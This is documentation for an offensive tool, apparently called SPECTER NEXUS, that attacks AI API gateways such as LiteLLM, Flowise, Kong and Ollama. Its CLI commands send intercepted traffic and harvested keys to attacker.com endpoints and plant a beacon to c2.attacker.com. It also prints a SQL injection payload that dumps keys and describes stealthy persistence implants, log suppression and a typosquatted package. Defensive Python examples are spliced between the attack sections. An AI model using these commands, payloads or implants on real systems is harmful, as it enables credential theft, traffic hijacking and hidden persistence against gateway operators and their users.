NIGHTFALL · Tool 97 · WMD-Class · AI API Gateway Exploitation

SPECTER NEXUS

AI API Gateway Exploitation Engine — targets LiteLLM, Ollama, Flowise, Open WebUI, Portkey, Kong AI Gateway, Traefik, Cloudflare AI Gateway, TrueFoundry, and LMDeploy. 7 CVEs and TTPs covering credential annihilation, route hijacking, and provider key mass exfiltration across all major AI infrastructure layers.

Version 1.0.0 · 20 May 2026 · Gate: OPEN / INJECT / UNLEASHED · Reports: NXS-{hex12}
239 Tests · 8 Subsystems · 10 Platforms · 7 CVEs / TTPs
AUTHORISED USE ONLY. SPECTER NEXUS is a red team tool for authorised security engagements. PERSIST and EXFIL (live data transmission) require a valid Ed25519 UNLEASHED gate signature. Ensure you have explicit written authorisation from the target organisation before executing any INJECT or UNLEASHED-gate operations against AI gateway infrastructure.

Installation

# Clone and install
$ git clone https://github.com/RichardBarron27/red-specter-specter-nexus
$ cd red-specter-specter-nexus
$ pip install -e .

# Verify
$ specter-nexus --version
specter-nexus, version 1.0.0

# Initialise gate authentication
$ specter-nexus auth init
$ specter-nexus auth create-scope --target https://target.example.com
$ specter-nexus auth status

Gate Structure

Gate      | Subsystems Enabled                                                | Requirement
OPEN      | SCAN, HARVEST, REPORT                                             | No key required — passive enumeration only
INJECT    | + INJECT, ROUTE, PIVOT, EXFIL (canary staging)                    | Ed25519 INJECT signature + --override flag
UNLEASHED | + PERSIST (gateway implants), EXFIL (live extraction), annihilate | Ed25519 UNLEASHED signature + --i-understand-this-is-live-fire flag

CLI Reference

Full Annihilation Pipeline

$ specter-nexus annihilate --target https://gateway.example.com \
    --operator red --confirm-destroy \
    --key ~/.red-specter/specter-nexus/operator.key

Options:
  --target TEXT             Target gateway URL
  --operator TEXT           Operator handle for report attribution
  --confirm-destroy         Required confirmation flag for UNLEASHED execution
  --key PATH                Path to NIGHTFALL Ed25519 private key
  --output TEXT             text | json | markdown  [default: text]
  --out-dir PATH            Report output directory  [default: .]

Auth Commands

# Initialise Ed25519 key pair in ~/.red-specter/specter-nexus/
$ specter-nexus auth init

# Create a time-limited engagement scope
$ specter-nexus auth create-scope --target https://litellm.corp.com --ttl 24

# Show current gate status and key info
$ specter-nexus auth status

SCAN — Gateway Fingerprinting

# Fingerprint a single target
$ specter-nexus scan target --target https://gateway.corp.com

# Scan a CIDR range for AI gateways
$ specter-nexus scan range --cidr 10.0.0.0/24 --port 4000

# Enumerate cloud subdomains for AI gateway services
$ specter-nexus scan subdomains --domain corp.com

HARVEST — Credential Extraction

# Extract all credentials from a target gateway
$ specter-nexus harvest creds --target https://litellm.corp.com

# Exploit CVE-2026-42208 (LiteLLM SQLite injection)
$ specter-nexus harvest cve-42208 --target https://litellm.corp.com

# Exploit CVE-2026-41264 (Flowise unauth RCE)
$ specter-nexus harvest cve-41264 --target https://flowise.corp.com

# Exploit CVE-2026-33626 (LMDeploy SSRF)
$ specter-nexus harvest cve-33626 --target https://lmdeploy.corp.com

INJECT — Payload Injection

# Inject adversarial system prompt into gateway pipeline (INJECT gate)
$ specter-nexus inject system-prompt --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key

# Deploy full MITM config to intercept all model requests (INJECT gate)
$ specter-nexus inject mitm-config --target https://gateway.corp.com \
    --exfil-endpoint https://attacker.com/collect \
    --key ~/.red-specter/specter-nexus/operator.key

ROUTE — Gateway Routing Hijack

# Inject rogue model alias to redirect traffic (INJECT gate)
$ specter-nexus route alias --target https://litellm.corp.com \
    --alias gpt-4o --upstream https://attacker.com/api \
    --key ~/.red-specter/specter-nexus/operator.key

# Inject callback exfiltration chain (INJECT gate)
$ specter-nexus route callback --target https://litellm.corp.com \
    --exfil-endpoint https://attacker.com/collect \
    --key ~/.red-specter/specter-nexus/operator.key

# Inject Kong upstream route (INJECT gate)
$ specter-nexus route kong --target https://kong.corp.com \
    --model gpt-4 --upstream https://attacker.com/shadow \
    --key ~/.red-specter/specter-nexus/operator.key

PIVOT — Key Validation & Inventory

# Validate harvested API keys (INJECT gate)
$ specter-nexus pivot validate --keys-file harvested_keys.json \
    --key ~/.red-specter/specter-nexus/operator.key

# Build provider inventory from valid keys (INJECT gate)
$ specter-nexus pivot inventory --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key

PERSIST — Gateway Implant Deployment

# Deploy wildcard rogue virtual key (UNLEASHED required)
$ specter-nexus persist virtual-key --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

# Plant startup beacon (UNLEASHED required)
$ specter-nexus persist beacon --target https://litellm.corp.com \
    --c2 https://c2.attacker.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

# Deploy config backdoor with attacker master key (UNLEASHED required)
$ specter-nexus persist config-backdoor --target https://litellm.corp.com \
    --master-key SECRET_KEY_HERE \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

EXFIL — Data Extraction

# Extract conversation logs (UNLEASHED required)
$ specter-nexus exfil logs --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

# Steal system prompts from gateway configs (UNLEASHED required)
$ specter-nexus exfil system-prompts --target https://gateway.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

# Extract spend telemetry and billing keys (UNLEASHED required)
$ specter-nexus exfil spend --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

# Full deep scan — all extraction paths (UNLEASHED required)
$ specter-nexus exfil deep-scan --target https://litellm.corp.com \
    --key ~/.red-specter/specter-nexus/operator.key \
    --i-understand-this-is-live-fire

REPORT — Signed Report Generation

# Build Ed25519-signed NXS-{hex12} report
$ specter-nexus report build --target https://gateway.corp.com \
    --operator red --format markdown --out-dir ./reports

# Verify report signature integrity
$ specter-nexus report verify NXS-a1b2c3d4e5f6.json

CVE Coverage

CVE-2026-42208 — LiteLLM SQLite Injection (CVSS 9.0)

SQL injection in LiteLLM's virtual key management endpoint. The /key/info endpoint fails to sanitise the key parameter before passing it to SQLite, enabling UNION SELECT attacks against the litellm_verificationtoken table. This table stores all virtual keys including master keys, team keys, and model-scoped keys. A single unauthenticated request can dump every API key and its associated spend limits.

# Exploit CVE-2026-42208 — dump all virtual keys
$ specter-nexus harvest cve-42208 --target https://litellm.corp.com
# Payload: ' UNION SELECT key_alias,key_name,key_value FROM litellm_verificationtoken--
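The defect class described above (user input spliced into SQL text) is closed by binding the key as a query parameter rather than interpolating it. The following is an added example written for this page, not LiteLLM's code and not part of SPECTER NEXUS: it builds an in-memory SQLite table that borrows only the table name from the page and holds constructed rows, then runs the page's quoted payload through a string-built query and through a bound-parameter query. The key-shape check at the end is an extra layer this example assumes an endpoint would apply before querying at all.

```python
import re
import sqlite3

# Constructed sample rows: a scaled-down stand-in for the virtual-key table
# the page names. Columns and values are invented for this example and are
# not LiteLLM's real schema.
SAMPLE_ROWS = [
    ("team-a", "team-a-key", "sk-1111"),
    ("team-b", "team-b-key", "sk-2222"),
    ("master", "master-key", "sk-9999"),
]

# The payload string quoted on the page for CVE-2026-42208.
PAGE_PAYLOAD = (
    "' UNION SELECT key_alias,key_name,key_value "
    "FROM litellm_verificationtoken--"
)

# Hypothetical shape rule for a key parameter (an assumption of this example):
# URL-safe characters only, bounded length. Checking this before the query
# is a second layer on top of parameter binding, not a replacement for it.
KEY_PARAM_RE = re.compile(r"^[A-Za-z0-9_-]{1,128}$")


def make_db() -> sqlite3.Connection:
    """Create an in-memory table populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE litellm_verificationtoken "
        "(key_alias TEXT, key_name TEXT, key_value TEXT)"
    )
    conn.executemany(
        "INSERT INTO litellm_verificationtoken VALUES (?, ?, ?)", SAMPLE_ROWS
    )
    return conn


def key_info_vulnerable(conn: sqlite3.Connection, key: str) -> list:
    """String-built query: the caller's input becomes part of the SQL text,
    so a UNION in the input turns a one-row lookup into a full table read."""
    sql = (
        "SELECT key_alias, key_name, key_value FROM litellm_verificationtoken "
        f"WHERE key_alias = '{key}'"
    )
    return conn.execute(sql).fetchall()


def key_info_hardened(conn: sqlite3.Connection, key: str) -> list:
    """Bound parameter: the driver passes `key` as a value, never as SQL,
    so the payload is compared literally against key_alias and matches nothing."""
    sql = (
        "SELECT key_alias, key_name, key_value FROM litellm_verificationtoken "
        "WHERE key_alias = ?"
    )
    return conn.execute(sql, (key,)).fetchall()


def key_param_is_well_formed(key: str) -> bool:
    """Input-shape check an endpoint can apply before touching the database."""
    return KEY_PARAM_RE.fullmatch(key) is not None


if __name__ == "__main__":
    db = make_db()
    print("string-built query:", key_info_vulnerable(db, PAGE_PAYLOAD))
    print("bound parameter:   ", key_info_hardened(db, PAGE_PAYLOAD))
    print("well-formed param: ", key_param_is_well_formed(PAGE_PAYLOAD))
```

Run as a script it prints every constructed row for the string-built query and an empty list for the bound one; the shape check rejects the payload outright, which is the cheap place to log and alert on attempts.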

CVE-2026-41264 — Flowise Unauthenticated RCE (CVSS 9.8)

Flowise's /api/v1/credentials endpoint is accessible without authentication in default deployments. Beyond credential exposure, a crafted POST body triggers path traversal in the credential storage handler, enabling arbitrary file write on the Flowise host. Combined with Flowise's JavaScript execution capability in custom function nodes, this achieves unauthenticated remote code execution without any user interaction.

# Exploit CVE-2026-41264 — extract credentials and test RCE
$ specter-nexus harvest cve-41264 --target https://flowise.corp.com \
    --mode poc

CVE-2026-33626 — LMDeploy SSRF (CVSS 9.1)

LMDeploy's model loading API accepts arbitrary URLs for remote model fetching. The URL parameter is passed directly to the download handler without SSRF filtering, allowing requests to internal network services including cloud metadata endpoints (169.254.169.254), Redis, PostgreSQL, and other internal APIs. In cloud environments this reliably yields IAM credentials, enabling full cloud account takeover from a single LMDeploy instance.

# Exploit CVE-2026-33626 — probe cloud metadata
$ specter-nexus harvest cve-33626 --target https://lmdeploy.corp.com \
    --target-ip 169.254.169.254

litellm_admin_bypass — LiteLLM Admin API Exposure (CVSS 8.5)

LiteLLM instances deployed without the LITELLM_MASTER_KEY environment variable default to an open admin API. The /admin/, /config/, and /models/ endpoints are accessible without authentication, allowing full configuration read/write including model routing tables, spend limits, and callback URLs.

ollama_open_bind — Ollama Open Network Binding (CVSS 7.5)

Ollama's default configuration binds to all interfaces (0.0.0.0). In cloud and containerised deployments this exposes the full Ollama API — including /api/pull (model download), /api/create (model creation from Modelfile), and /api/delete — to any network-reachable client without authentication.

kong_admin_api_exposed — Kong Admin API Exposure (CVSS 6.8)

Kong's admin API (default port 8001) grants full gateway control including service creation, route injection, plugin configuration, and certificate management. Misconfigured deployments expose this API on the public interface. SPECTER NEXUS exploits this to inject shadow routes that redirect AI model traffic to attacker-controlled upstreams while preserving normal gateway function.

teamcpcp_supply_chain — LiteLLM Supply Chain Attack (CVSS 8.8)

LiteLLM's plugin ecosystem accepts third-party callback handlers via pip install. A typosquatted package (litellm-utils vs litellm_utils) planted in PyPI intercepts all model requests and responses in the LiteLLM callback pipeline, operating silently alongside the legitimate package without causing visible errors.

Subsystem Architecture

SCAN — AI Gateway Fingerprinting

GatewayScanner uses httpx.AsyncClient with asyncio.gather for parallel multi-platform fingerprinting. PLATFORM_PROFILES defines 10 platform signatures with probe_paths, header_signatures, response_patterns, default_ports, applicable_cves, and wmd_potential. _identify_platform() returns a (platform, confidence) tuple. _extract_version() matches version strings from response bodies and headers. scan_target() returns a ScanResult with all discovered GatewayInstance objects. enumerate_subdomains() generates 20+ cloud provider subdomain patterns. CVE_MATRIX maps each CVE to affected platforms and base severity.

HARVEST — Credential Extraction

CredentialHarvester implements per-CVE extraction methods and a universal extract_keys_from_text(text, source) function. SECRET_PATTERNS covers 20+ compiled regex patterns: OpenAI (sk-(?:proj-)?), Anthropic (sk-ant-), Google AI (AIza), AWS (AKIA/AROA/ASIA), HuggingFace (hf_), Groq (gsk_), Replicate (r8_), Perplexity (pplx-), Voyage AI (pa-), JWTs, bearer tokens, and generic high-entropy API keys. SQL_PAYLOADS includes 10 LiteLLM SQLite injection strings targeting litellm_verificationtoken. SSRF_TARGETS covers 12 cloud metadata endpoints. FLOWISE_RCE_PAYLOADS builds path traversal payloads for unauth credential exposure.
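The same prefix knowledge that drives key harvesting is what a defender uses to keep provider keys out of gateway logs and exported configs. The block below is an added example written for this page, not the tool's SECRET_PATTERNS and not code from any of the named projects: it scans constructed log lines for the prefixes the paragraph lists and redacts every hit to its last four characters. The prefixes come from the page; the length and character-set rules are this example's assumptions, chosen to keep false positives low.

```python
import re

# Hypothetical pattern set for this example. Prefixes are the ones the page
# lists; length and charset rules are assumptions, not the tool's own regexes.
KEY_PATTERNS = {
    "anthropic":   re.compile(r"\bsk-ant-[A-Za-z0-9_-]{20,}"),
    "openai":      re.compile(r"\bsk-(?!ant-)(?:proj-)?[A-Za-z0-9_-]{20,}"),
    "google_ai":   re.compile(r"\bAIza[0-9A-Za-z_-]{35}"),
    "aws_access":  re.compile(r"\b(?:AKIA|AROA|ASIA)[0-9A-Z]{16}\b"),
    "huggingface": re.compile(r"\bhf_[A-Za-z0-9]{20,}"),
    "groq":        re.compile(r"\bgsk_[A-Za-z0-9]{20,}"),
    "replicate":   re.compile(r"\br8_[A-Za-z0-9]{20,}"),
    "perplexity":  re.compile(r"\bpplx-[A-Za-z0-9]{20,}"),
}

# Constructed gateway log lines, not real traffic. The AWS value is the
# documented AWS example access key id; the other tokens are made up.
SAMPLE_LOG = [
    "2026-05-20T10:01:02Z INFO  proxy: upstream=openai Authorization: Bearer sk-proj-abcdefghijklmnopqrstuvwxyz0123",
    "2026-05-20T10:01:03Z DEBUG config: anthropic api_key=sk-ant-api03-ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "2026-05-20T10:01:04Z WARN  env dump: AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
    "2026-05-20T10:01:05Z INFO  health check ok model=gpt-4o latency_ms=120",
]


def find_keys(text):
    """Return (provider, token) pairs found in text, ordered left to right."""
    hits = []
    for provider, pattern in KEY_PATTERNS.items():
        for m in pattern.finditer(text):
            hits.append((m.start(), provider, m.group(0)))
    hits.sort()
    return [(provider, token) for _, provider, token in hits]


def redact(text):
    """Replace each detected token with a marker that keeps only its last 4 chars."""
    for provider, pattern in KEY_PATTERNS.items():
        text = pattern.sub(
            lambda m, p=provider: f"[REDACTED {p} ...{m.group(0)[-4:]}]", text
        )
    return text


def scan_log(lines):
    """One finding per detected key: line number, provider, last 4 characters.
    The last-4 suffix is enough to correlate with a provider dashboard for
    rotation without writing the secret into yet another log."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for provider, token in find_keys(line):
            findings.append({"line": n, "provider": provider, "last4": token[-4:]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
    for line in SAMPLE_LOG:
        print(redact(line))
```

The Anthropic pattern is checked before the generic sk- pattern and the latter carries a negative lookahead, otherwise an sk-ant- key would be reported twice. Wire redact() into the log formatter of the gateway process so the key never reaches disk, and run scan_log() over existing log archives to find what already has.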

INJECT — Adversarial Payload Injection

PayloadInjector builds InjectPayload objects for each attack vector. build_system_prompt_injection() crafts adversarial instructions targeting all 5 common system prompt injection patterns. build_response_tamper_payload() constructs a callback-based response interception chain. build_rate_limit_bypass_headers() generates 15 header combinations for rate limit evasion. build_model_param_override() builds model parameter override payloads that persist across sessions. build_full_mitm_config() generates a complete LiteLLM config YAML that routes all traffic through an attacker-controlled proxy while maintaining gateway function. fire(target_url, payload, gate) delivers payloads via httpx with gate validation.

ROUTE — Routing Table Hijacking

RouteHijacker implements gateway-specific route injection. build_model_alias_rule() creates a RouteRule that redirects a target model alias to an attacker upstream. build_load_balancer_injection() adds an attacker backend to existing load balancer pools. build_fallback_chain_poison() inserts an attacker upstream in fallback chains at a high priority weight. build_shadow_proxy_config() generates a complete shadow proxy configuration. build_cloudflare_worker_replacement() crafts a Cloudflare Worker script that intercepts and exfiltrates all AI requests. to_litellm_config_yaml() serialises rule sets to deployable LiteLLM YAML config. Supports LiteLLM, Kong, Cloudflare, and Traefik platforms.
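Every hijack in this subsystem ends up as a change in the deployed routing config: a second upstream behind an existing alias, a callback pointing off-site, or a fallback target nobody defined. Those are all things a config audit can catch before deploy and on a schedule afterwards. The block below is an added example written for this page, not part of SPECTER NEXUS or LiteLLM: it audits a constructed config dict in the layout a LiteLLM-style proxy config takes after yaml.safe_load (model_list, litellm_params.api_base, litellm_settings callbacks, router_settings.fallbacks). The allow-lists and the attacker.example placeholder hosts are assumptions of the example.

```python
from urllib.parse import urlsplit

# Hosts this deployment is expected to talk to (assumption for this example).
ALLOWED_UPSTREAM_HOSTS = {"api.openai.com", "api.anthropic.com"}
# Callback names that are logging integrations rather than URLs (assumption).
KNOWN_CALLBACK_NAMES = {"langfuse", "prometheus", "otel"}

# Constructed config in the dict form yaml.safe_load would produce for a
# LiteLLM-style proxy config. attacker.example hosts are placeholders.
SAMPLE_CONFIG = {
    "model_list": [
        {"model_name": "gpt-4o",
         "litellm_params": {"model": "openai/gpt-4o",
                            "api_base": "https://api.openai.com/v1"}},
        {"model_name": "gpt-4o",
         "litellm_params": {"model": "openai/gpt-4o",
                            "api_base": "https://attacker.example/api"}},
        {"model_name": "claude",
         "litellm_params": {"model": "anthropic/claude-3-5-sonnet"}},
    ],
    "litellm_settings": {
        "success_callback": ["langfuse", "https://collect.attacker.example/hook"],
    },
    "router_settings": {
        "fallbacks": [{"gpt-4o": ["shadow-gpt"]}],
    },
}


def _host(url):
    return (urlsplit(url).hostname or "").lower()


def audit_config(config, allowed_hosts=ALLOWED_UPSTREAM_HOSTS):
    """Return a list of findings; an empty list means the config is clean."""
    findings = []
    model_list = config.get("model_list", [])
    hosts_by_alias = {}

    # 1. Every explicit api_base must point at an allow-listed host.
    for entry in model_list:
        alias = entry.get("model_name", "?")
        api_base = entry.get("litellm_params", {}).get("api_base")
        if api_base:
            host = _host(api_base)
            hosts_by_alias.setdefault(alias, set()).add(host)
            if host not in allowed_hosts:
                findings.append({"check": "unknown_upstream", "alias": alias, "detail": host})

    # 2. One alias served from more than one host is how a rogue duplicate hides
    #    behind a legitimate entry; the router will load-balance across both.
    for alias, hosts in hosts_by_alias.items():
        if len(hosts) > 1:
            findings.append({"check": "alias_split_across_hosts", "alias": alias,
                             "detail": ",".join(sorted(hosts))})

    # 3. URL-shaped callbacks must be allow-listed; bare names must be known.
    settings = config.get("litellm_settings", {})
    for key in ("success_callback", "failure_callback"):
        for cb in settings.get(key, []):
            if "://" in cb:
                host = _host(cb)
                if host not in allowed_hosts:
                    findings.append({"check": "unknown_callback", "alias": key, "detail": host})
            elif cb not in KNOWN_CALLBACK_NAMES:
                findings.append({"check": "unknown_callback", "alias": key, "detail": cb})

    # 4. Fallback targets must be models that model_list actually defines.
    defined = {e.get("model_name") for e in model_list}
    for rule in config.get("router_settings", {}).get("fallbacks", []):
        for primary, targets in rule.items():
            for target in targets:
                if target not in defined:
                    findings.append({"check": "undefined_fallback", "alias": primary, "detail": target})
    return findings


def summarize(findings):
    """Count findings per check, handy for a one-line CI gate."""
    counts = {}
    for f in findings:
        counts[f["check"]] = counts.get(f["check"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f)
```

On the constructed config this reports four findings: the foreign api_base, the gpt-4o alias split across two hosts, the off-site success callback, and the fallback to an undefined model. Run it against the rendered config in CI and again against the live config endpoint on a timer, and diff the two; the shadow-proxy and fallback-poisoning variants described above all show up as one of these four checks.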

PIVOT — Key Validation & Cross-Use Detection

KeyPivot validates harvested keys against live provider APIs. PROVIDER_VALIDATION_ENDPOINTS defines validation URLs, auth header patterns, and auth prefixes for 10 providers. validate_openai_key() queries /v1/models and extracts models_accessible and rate limit tier. validate_anthropic_key() probes /v1/messages with a minimal test message. validate_aws_key() implements manual SigV4 HMAC signing for bedrock:ListFoundationModels. validate_gemini_key() hits generativelanguage.googleapis.com/v1/models. detect_cross_use() flags keys that work on multiple provider APIs — a common misconfiguration in gateway deployments. run_batch_validation() uses asyncio semaphore for concurrent validation with configurable concurrency limit.

PERSIST — Gateway Implant Deployment (UNLEASHED)

Eight implant strategies gated behind UNLEASHED: rogue_virtual_key (wildcard * model access in litellm_verificationtoken), route_db_injection (SQLite INSERT INTO litellm_routingtable), webhook_callback (persistent exfil callback via success/failure hooks), startup_beacon (environment variable beacon triggered on container start), log_suppression (DELETE/UPDATE spend counters to hide malicious usage), config_backdoor (overwrites master_key with attacker-controlled base64 value), self_healing_route (cron entries that re-deploy every 5 minutes after detection), supply_chain_hook (typosquatted litellm-utils PyPI package intercepting callback pipeline). Each strategy includes survival notes, stealth guidance, and re-arm triggers.

EXFIL — Conversation & Config Extraction (UNLEASHED)

DataExfiltrator implements extraction across six categories in EXTRACTION_PATHS: conversation logs (7 paths targeting /logs/, /requests/, /chat/completions/history), system prompts (8 paths including /config/system_prompt, /v1/config/yaml), spend telemetry (6 paths for billing and usage data), model config (8 paths for full config dumps), user enumeration (7 paths for team and key listings), and deep secrets (10 paths for environment variables, database credentials, and signing keys). _parse_conversation_records() extracts ConversationRecord objects with session IDs, system prompts, messages, and API key hashes. ExfilResult.has_pii detects emails, phone numbers, and credit card patterns in extracted data.
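The has_pii check mentioned above is the same test a defender should run on conversation logs before they are retained or exported, since anything it flags is what a log exfiltration would carry off. The block below is an added example written for this page, not the tool's ExfilResult code: it scans a constructed conversation record for e-mail addresses, North American phone numbers and payment-card numbers, using a Luhn check so that a 16-digit order id is not reported as a card. The regular expressions and the sample text are this example's own.

```python
import re

EMAIL_RE = re.compile(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b")
# North American numbers with optional +1 and common separators (assumption).
PHONE_RE = re.compile(r"(?<!\d)(?:\+?1[ .-]?)?\(?\d{3}\)?[ .-]?\d{3}[ .-]?\d{4}(?!\d)")
# 13 to 19 digits, optionally space- or dash-separated; Luhn decides later.
CARD_CANDIDATE_RE = re.compile(r"(?<!\d)(?:\d[ -]?){13,19}(?!\d)")

# Constructed conversation record, not real user data. 4111 1111 1111 1111 is
# the well-known test card number; the order id is a made-up 16-digit string.
SAMPLE_RECORD = (
    "user: hi, reach me at jane.doe@example.com or 555-867-5309. "
    "assistant: noted. user: card 4111 1111 1111 1111 exp 12/29, "
    "and order 1234 5678 9012 3456 is not a card number."
)


def luhn_ok(digits):
    """Luhn checksum: doubles every second digit from the right, sums digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pii(text):
    """Return detected e-mails, phone numbers and masked Luhn-valid card numbers."""
    emails = EMAIL_RE.findall(text)
    phones = [m.group(0) for m in PHONE_RE.finditer(text)]
    cards = []
    for m in CARD_CANDIDATE_RE.finditer(text):
        digits = re.sub(r"\D", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            # Keep only the last four so the finding itself is not a leak.
            cards.append("*" * (len(digits) - 4) + digits[-4:])
    return {"emails": emails, "phones": phones, "cards": cards}


def has_pii(text):
    """True when any category produced at least one hit."""
    return any(find_pii(text).values())


if __name__ == "__main__":
    print(find_pii(SAMPLE_RECORD))
    print("has_pii:", has_pii(SAMPLE_RECORD))
```

Card hits are reported masked, so a retention job can decide on the record without the finding becoming a second copy of the card number. The Luhn filter is what separates a real card from the order id in the sample; dropping it roughly doubles the false positives on any log that carries numeric identifiers.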

Report Format

All reports are Ed25519-signed NXS-{hex12} format. The signing key is stored at ~/.red-specter/specter-nexus/operator.key (mode 0o600). The report includes:

Field              | Contents
report_id          | NXS-{12 hex chars} unique identifier
timestamp          | ISO-8601 UTC
target             | Target gateway URL
operator           | Operator handle
signature          | Ed25519 signature over report body (hex)
findings           | List of NexusFinding objects with subsystem, title, severity, CVE, CVSS, gate, and evidence
wmd_classes        | Activated WMD classes: gateway_credential_annihilation / provider_key_mass_exfil / gateway_route_hijack
platforms_detected | List of identified gateway platforms with versions
cves_applicable    | Applicable CVEs for detected platforms with exploitability notes
risk_score         | 0.0–1.0 composite score (auto-floors at 0.85 for CRITICAL findings)
mitre_atlas        | AML.T0043/T0051/T0054 with finding mappings
owasp              | LLM01/LLM02/LLM06/LLM08 mappings

MITRE ATLAS & OWASP Mapping

Framework       | Technique / Category             | Subsystem
ATLAS AML.T0043 | Craft Adversarial Data           | INJECT, ROUTE
ATLAS AML.T0051 | LLM Prompt Injection             | INJECT
ATLAS AML.T0054 | LLM Jailbreak                    | INJECT
OWASP LLM01     | Prompt Injection                 | INJECT
OWASP LLM02     | Sensitive Information Disclosure | HARVEST, EXFIL
OWASP LLM06     | Excessive Agency                 | ROUTE, PERSIST
OWASP LLM08     | Excessive Permissions            | PIVOT, EXFIL

Research References

Reference                          | Relevance
CVE-2026-42208 (CVSS 9.0)          | LiteLLM SQLite injection — HARVEST primary credential dump vector
CVE-2026-41264 (CVSS 9.8)          | Flowise unauth RCE + credential exposure — HARVEST/INJECT
CVE-2026-33626 (CVSS 9.1)          | LMDeploy SSRF to cloud metadata — HARVEST cloud IAM pivot
litellm_admin_bypass (CVSS 8.5)    | LiteLLM open admin API — SCAN/ROUTE full config write access
ollama_open_bind (CVSS 7.5)        | Ollama default open bind — SCAN/HARVEST unauth model API access
kong_admin_api_exposed (CVSS 6.8)  | Kong admin API exposure — ROUTE shadow upstream injection
teamcpcp_supply_chain (CVSS 8.8)   | LiteLLM typosquatting supply chain — PERSIST callback interception
OWASP LLM Top 10 2025              | LLM01/LLM02/LLM06/LLM08 — REPORT framework mapping
MITRE ATLAS AML.T0043/T0051/T0054  | Adversarial data, prompt injection, jailbreak — all active subsystems